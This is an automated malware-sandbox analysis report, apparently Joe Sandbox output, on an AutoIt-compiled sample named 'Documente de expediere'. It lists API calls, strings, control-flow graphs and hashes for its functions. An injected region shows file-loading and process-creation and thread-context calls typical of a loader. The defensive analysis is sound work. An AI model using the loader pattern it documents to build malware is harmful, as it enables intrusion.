                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: c449883c98bed939662f8e97ea893abf59ea7428fa1da9804e9102fd15d949c1
                                                • Instruction ID: 1c06bd2a55938c9f0e6fbeb4b8e02b4f9950f23982e67985dbe16bf64039008b
                                                • Opcode Fuzzy Hash: c449883c98bed939662f8e97ea893abf59ea7428fa1da9804e9102fd15d949c1
                                                • Instruction Fuzzy Hash: 7821A0B1911318AFDB00DFA8E889ADDBBF4FB08711F50C12AF914A72A0D7B955448F99
                                                Function 006971EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00694864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007562F8,?,006937C0,?), ref: 00694882
                                                  • Part of subcall function 006B074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006972C5), ref: 006B0771
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00697308
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006CECF1
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006CED32
                                                • RegCloseKey.ADVAPI32(?), ref: 006CED70
                                                • _wcscat.LIBCMT ref: 006CEDC9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 2673923337-2727554177
                                                • Opcode ID: ff156107999e737238e9ff203eda4e909365cb19064284f13e85bf8fa078fd89
                                                • Instruction ID: 88a332103ede082843c2075604dae8918eff1c6d41ac3f86c3f7dc52d6396302
                                                • Opcode Fuzzy Hash: ff156107999e737238e9ff203eda4e909365cb19064284f13e85bf8fa078fd89
                                                • Instruction Fuzzy Hash: 13716C710083019AC758EF25EC819EBB7F9FF58350F40852EF445872A1EBB49989CB5A
                                                Function 00693633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 760 693633-693681 762 6936e1-6936e3 760->762 763 693683-693686 760->763 762->763 766 6936e5 762->766 764 693688-69368f 763->764 765 6936e7 763->765 767 69375d-693765 PostQuitMessage 764->767 768 693695-69369a 764->768 770 6cd31c-6cd34a call 6a11d0 call 6a11f3 765->770 771 6936ed-6936f0 765->771 769 6936ca-6936d2 DefWindowProcW 766->769 776 693711-693713 767->776 772 6cd38f-6cd3a3 call 6f2a16 768->772 773 6936a0-6936a2 768->773 775 6936d8-6936de 769->775 806 6cd34f-6cd356 770->806 777 6936f2-6936f3 771->777 778 693715-69373c SetTimer RegisterWindowMessageW 771->778 772->776 797 6cd3a9 772->797 779 6936a8-6936ad 773->779 780 693767-693776 call 694531 773->780 776->775 784 6936f9-69370c KillTimer call 6944cb call 693114 777->784 785 6cd2bf-6cd2c2 777->785 778->776 781 69373e-693749 CreatePopupMenu 778->781 786 6cd374-6cd37b 779->786 787 6936b3-6936b8 779->787 780->776 781->776 784->776 791 6cd2f8-6cd317 MoveWindow 785->791 792 6cd2c4-6cd2c6 785->792 786->769 794 6cd381-6cd38a call 6e817e 786->794 795 69374b-69375b call 6945df 787->795 796 6936be-6936c4 787->796 791->776 800 6cd2c8-6cd2cb 792->800 801 6cd2e7-6cd2f3 SetFocus 792->801 794->769 795->776 796->769 796->806 797->769 800->796 807 6cd2d1-6cd2e2 call 6a11d0 800->807 801->776 806->769 810 6cd35c-6cd36f call 6944cb call 6943db 806->810 807->776 810->769
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?), ref: 006936D2
                                                • KillTimer.USER32(?,00000001), ref: 006936FC
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0069371F
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0069372A
                                                • CreatePopupMenu.USER32 ref: 0069373E
                                                • PostQuitMessage.USER32(00000000), ref: 0069375F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated$%r
                                                • API String ID: 129472671-4130811174
                                                • Opcode ID: eceb465abbce6ce2a52f38639da49c13905f73785dbb4acce5c5bdf65886e3cd
                                                • Instruction ID: 2c74061e2a46a61cca3cb0b5d652533275941bdd9ed8688c9999fa9d0f772ce8
                                                • Opcode Fuzzy Hash: eceb465abbce6ce2a52f38639da49c13905f73785dbb4acce5c5bdf65886e3cd
                                                • Instruction Fuzzy Hash: 734117B1204215BBDF145BA8DC09BF9375FE701301F54413DFA028BBE1DAA8AE05966E
                                                Function 00693A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00693A62
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00693A71
                                                • LoadIconW.USER32(00000063), ref: 00693A88
                                                • LoadIconW.USER32(000000A4), ref: 00693A9A
                                                • LoadIconW.USER32(000000A2), ref: 00693AAC
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00693AD2
                                                • RegisterClassExW.USER32(?), ref: 00693B28
                                                  • Part of subcall function 00693041: GetSysColorBrush.USER32(0000000F), ref: 00693074
                                                  • Part of subcall function 00693041: RegisterClassExW.USER32(00000030), ref: 0069309E
                                                  • Part of subcall function 00693041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
                                                  • Part of subcall function 00693041: InitCommonControlsEx.COMCTL32(?), ref: 006930CC
                                                  • Part of subcall function 00693041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
                                                  • Part of subcall function 00693041: LoadIconW.USER32(000000A9), ref: 006930F2
                                                  • Part of subcall function 00693041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: 53bba210fca57143bdc8782190a0634cb689860993e38541ab77dcd31a2a3458
                                                • Instruction ID: 0142612e8f5e40c97ba3044435584dc7a83af9232af922dfb8a3497d2058d4ee
                                                • Opcode Fuzzy Hash: 53bba210fca57143bdc8782190a0634cb689860993e38541ab77dcd31a2a3458
                                                • Instruction Fuzzy Hash: 86211771900308AFEB109FA8EC09BDD7BB5FB08712F40812AE504A72E0D7BA56549F98
                                                Function 00693778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bu
                                                • API String ID: 1825951767-1794477260
                                                • Opcode ID: 5ab4bedc664cad7a8234e619d2f8cb579e264f74d92add7ecc806fcede982c72
                                                • Instruction ID: 064d894480efbd16f22f152469c4b6728482703a5219824bd073a87ae7a0708f
                                                • Opcode Fuzzy Hash: 5ab4bedc664cad7a8234e619d2f8cb579e264f74d92add7ecc806fcede982c72
                                                • Instruction Fuzzy Hash: 7BA15F719102299ACF54EFA4CC95EFEB77EBF14300F44012EE416A7691EF745A0ACB68
                                                Function 0069F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006B03D3
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 006B03DB
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006B03E6
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006B03F1
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 006B03F9
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 006B0401
                                                  • Part of subcall function 006A6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0069FA90), ref: 006A62B4
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0069FB2D
                                                • OleInitialize.OLE32(00000000), ref: 0069FBAA
                                                • CloseHandle.KERNEL32(00000000), ref: 006D49F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID: <gu$\du$%r$cu
                                                • API String ID: 1986988660-3505173898
                                                • Opcode ID: fa58a968c81186b67f2671f274f98dbc5438e661f7f85355ce548172a454b571
                                                • Instruction ID: 0b23fa975d0604367031606e54e7f349f751e9223b68bc2db3a4d4f181433ca9
                                                • Opcode Fuzzy Hash: fa58a968c81186b67f2671f274f98dbc5438e661f7f85355ce548172a454b571
                                                • Instruction Fuzzy Hash: F681BCB09003808FC784EF69E9406E57AE6FB98316790C67ED418C7362EBBD46458F58
                                                Function 01542650 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 993 1542650-15426fe call 1540000 996 1542705-154272b call 1543560 CreateFileW 993->996 999 1542732-1542742 996->999 1000 154272d 996->1000 1008 1542744 999->1008 1009 1542749-1542763 VirtualAlloc 999->1009 1001 154287d-1542881 1000->1001 1002 15428c3-15428c6 1001->1002 1003 1542883-1542887 1001->1003 1005 15428c9-15428d0 1002->1005 1006 1542893-1542897 1003->1006 1007 1542889-154288c 1003->1007 1010 1542925-154293a 1005->1010 1011 15428d2-15428dd 1005->1011 1012 15428a7-15428ab 1006->1012 1013 1542899-15428a3 1006->1013 1007->1006 1008->1001 1014 1542765 1009->1014 1015 154276a-1542781 ReadFile 1009->1015 1020 154293c-1542947 VirtualFree 1010->1020 1021 154294a-1542952 1010->1021 1018 15428e1-15428ed 1011->1018 1019 15428df 1011->1019 1022 15428ad-15428b7 1012->1022 1023 15428bb 1012->1023 1013->1012 1014->1001 1016 1542783 1015->1016 1017 1542788-15427c8 VirtualAlloc 1015->1017 1016->1001 1024 15427cf-15427ea call 15437b0 1017->1024 1025 15427ca 1017->1025 1026 1542901-154290d 1018->1026 1027 15428ef-15428ff 1018->1027 1019->1010 1020->1021 1022->1023 1023->1002 1033 15427f5-15427ff 1024->1033 1025->1001 1030 154290f-1542918 1026->1030 1031 154291a-1542920 1026->1031 1029 1542923 1027->1029 1029->1005 1030->1029 1031->1029 1034 1542801-1542830 call 15437b0 1033->1034 1035 1542832-1542846 call 15435c0 1033->1035 1034->1033 1041 1542848 1035->1041 1042 154284a-154284e 1035->1042 1041->1001 1043 1542850-1542854 FindCloseChangeNotification 1042->1043 1044 154285a-154285e 1042->1044 1043->1044 1045 1542860-154286b VirtualFree 1044->1045 1046 154286e-1542877 1044->1046 1045->1046 1046->996 1046->1001
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01542721
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01542947
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                • Instruction ID: 6dc7afbfde799d746d16a5c98dacfa9ffd04cb7eaf50cc767fed9491ed094ff1
                                                • Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                • Instruction Fuzzy Hash: 28A10874E00219EBEB14CFA4D894BEEBBB5BF48308F208559E605BB281D7759A81CF54
                                                Function 006939E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1114 6939e7-693a57 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00693A15
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00693A36
                                                • ShowWindow.USER32(00000000,?,?), ref: 00693A4A
                                                • ShowWindow.USER32(00000000,?,?), ref: 00693A53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: cc4f46d59fc26f655d6031e27e6b5e08232dfa1f100eb7e44947fbe98c9ed627
                                                • Instruction ID: 4da52b6dc085c6a236437adb866ba053d36bdacb561ce25ad023710a6d975ac1
                                                • Opcode Fuzzy Hash: cc4f46d59fc26f655d6031e27e6b5e08232dfa1f100eb7e44947fbe98c9ed627
                                                • Instruction Fuzzy Hash: ADF0DA716413907EEB3117276C49EA72E7DE7C6F61F40812AF908A31B0C6ED5851DAB8
                                                Function 015423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 167fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1115 15423b0-1542542 call 1540000 call 15422a0 CreateFileW 1122 1542544 1115->1122 1123 1542549-1542559 1115->1123 1124 15425fc-1542601 1122->1124 1126 1542560-154257a VirtualAlloc 1123->1126 1127 154255b 1123->1127 1128 154257c 1126->1128 1129 154257e-1542598 ReadFile 1126->1129 1127->1124 1128->1124 1130 154259c-15425d6 call 15422e0 call 15412a0 1129->1130 1131 154259a 1129->1131 1136 15425f2-15425fa ExitProcess 1130->1136 1137 15425d8-15425ed call 1542330 1130->1137 1131->1124 1136->1124 1137->1136
                                                APIs
                                                  • Part of subcall function 015422A0: Sleep.KERNELBASE(000001F4), ref: 015422B1
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01542535
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: 7P30SL8N513A4AJ792AXXI6
                                                • API String ID: 2694422964-3581404349
                                                • Opcode ID: 692ef7c4377cb9bfc4730f5340a70a909eaa7482126d8b578c5e1ce9c06265fd
                                                • Instruction ID: f67283c97c1db71ef8e48a8614aebfa60052b7ff5d6c8d79cf55e870a2d3ba35
                                                • Opcode Fuzzy Hash: 692ef7c4377cb9bfc4730f5340a70a909eaa7482126d8b578c5e1ce9c06265fd
                                                • Instruction Fuzzy Hash: E7719330D0425DDBEF11DBE4D8547EEBB79AF58304F004099E209BB2C1D6BA1B45CBA6
                                                Function 006B564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1139 6b564d-6b5666 1140 6b5668-6b566d 1139->1140 1141 6b5683 1139->1141 1140->1141 1142 6b566f-6b5671 1140->1142 1143 6b5685-6b568b 1141->1143 1144 6b568c-6b5691 1142->1144 1145 6b5673-6b5678 call 6b8d68 1142->1145 1147 6b569f-6b56a3 1144->1147 1148 6b5693-6b569d 1144->1148 1157 6b567e call 6b8ff6 1145->1157 1150 6b56b3-6b56b5 1147->1150 1151 6b56a5-6b56b0 call 6b3020 1147->1151 1148->1147 1149 6b56c3-6b56d2 1148->1149 1155 6b56d9 1149->1155 1156 6b56d4-6b56d7 1149->1156 1150->1145 1154 6b56b7-6b56c1 1150->1154 1151->1150 1154->1145 1154->1149 1159 6b56de-6b56e3 1155->1159 1156->1159 1157->1141 1161 6b56e9-6b56f0 1159->1161 1162 6b57cc-6b57cf 1159->1162 1163 6b56f2-6b56fa 1161->1163 1164 6b5731-6b5733 1161->1164 1162->1143 1163->1164 1167 6b56fc 1163->1167 1165 6b579d-6b579e call 6c0df7 1164->1165 1166 6b5735-6b5737 1164->1166 1174 6b57a3-6b57a7 1165->1174 1169 6b575b-6b5766 1166->1169 1170 6b5739-6b5741 1166->1170 1171 6b57fa 1167->1171 1172 6b5702-6b5704 1167->1172 1177 6b576a-6b576d 1169->1177 1178 6b5768 1169->1178 1175 6b5743-6b574f 1170->1175 1176 6b5751-6b5755 1170->1176 1173 6b57fe-6b5807 1171->1173 1179 6b570b-6b5710 1172->1179 1180 6b5706-6b5708 1172->1180 1173->1143 1174->1173 1183 6b57a9-6b57ae 1174->1183 1184 6b5757-6b5759 1175->1184 1176->1184 1182 6b57d4-6b57d8 1177->1182 1185 6b576f-6b577b call 6b4916 call 6c10ab 1177->1185 1178->1177 1181 6b5716-6b572f call 6c0f18 1179->1181 1179->1182 1180->1179 1197 6b5792-6b579b 1181->1197 1188 6b57ea-6b57f5 call 6b8d68 1182->1188 1189 6b57da-6b57e7 call 6b3020 1182->1189 1183->1182 1187 6b57b0-6b57c1 1183->1187 1184->1177 1200 6b5780-6b5785 1185->1200 1193 6b57c4-6b57c6 1187->1193 1188->1157 1189->1188 1193->1161 1193->1162 1197->1193 1201 6b578b-6b578e 1200->1201 1202 6b580c-6b5810 1200->1202 1201->1171 1203 6b5790 1201->1203 1202->1173 1203->1197
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                • String ID:
                                                • API String ID: 1559183368-0
                                                • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                • Instruction ID: 6efa691e20454ddcb106d797d9ac2dd0a2739f4a0078c2ede07432064d039dea
                                                • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                • Instruction Fuzzy Hash: 555185B0B00B05DBDB249F69C8847EE77A7AF41320F64863DF827962D1EB709D918B45
                                                Function 006969CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00694F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007562F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694F6F
                                                • _free.LIBCMT ref: 006CE68C
                                                • _free.LIBCMT ref: 006CE6D3
                                                  • Part of subcall function 00696BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00696D0D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                • API String ID: 2861923089-1757145024
                                                • Opcode ID: a91356c787bad64211c14941c9ab6343b0d86ccd67dcb2acd2bff62f254d07eb
                                                • Instruction ID: dedd5e453fb8f5b75482e30de9a82e2b060e79f89c26a606becf544a73e7c228
                                                • Opcode Fuzzy Hash: a91356c787bad64211c14941c9ab6343b0d86ccd67dcb2acd2bff62f254d07eb
                                                • Instruction Fuzzy Hash: 9C917C71910219AFCF44EFA8C891EFDB7BAFF14314B14442DF816AB2A1EB319945CB54
                                                Function 006935B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006935A1,SwapMouseButtons,00000004,?), ref: 006935D4
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006935A1,SwapMouseButtons,00000004,?,?,?,?,00692754), ref: 006935F5
                                                • RegCloseKey.KERNELBASE(00000000,?,?,006935A1,SwapMouseButtons,00000004,?,?,?,?,00692754), ref: 00693617
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: b97db846e38984d027dcc9d5878e6b6607c873aff4fc1992a414b0bbdc62124a
                                                • Instruction ID: 7e2d03841b87b6489c10059bfecf89c072ae1e976fc4dfe47cb995d87cb2a50a
                                                • Opcode Fuzzy Hash: b97db846e38984d027dcc9d5878e6b6607c873aff4fc1992a414b0bbdc62124a
                                                • Instruction Fuzzy Hash: 89113371610228BADF208FA8DC80AEABBAEEF04740F008469E805D7310E2719E419BA4
                                                Function 015412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01541A5B
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01541AF1
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01541B13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: fc8f1a43d92b409a9fc3443f05f08a35b7dbde12cca23af92c4c83ca62f6b31d
                                                • Instruction ID: 3815cdc4bce9fa88e8d4eddeb66251611d82ce15bdfbaab57c902592942500f5
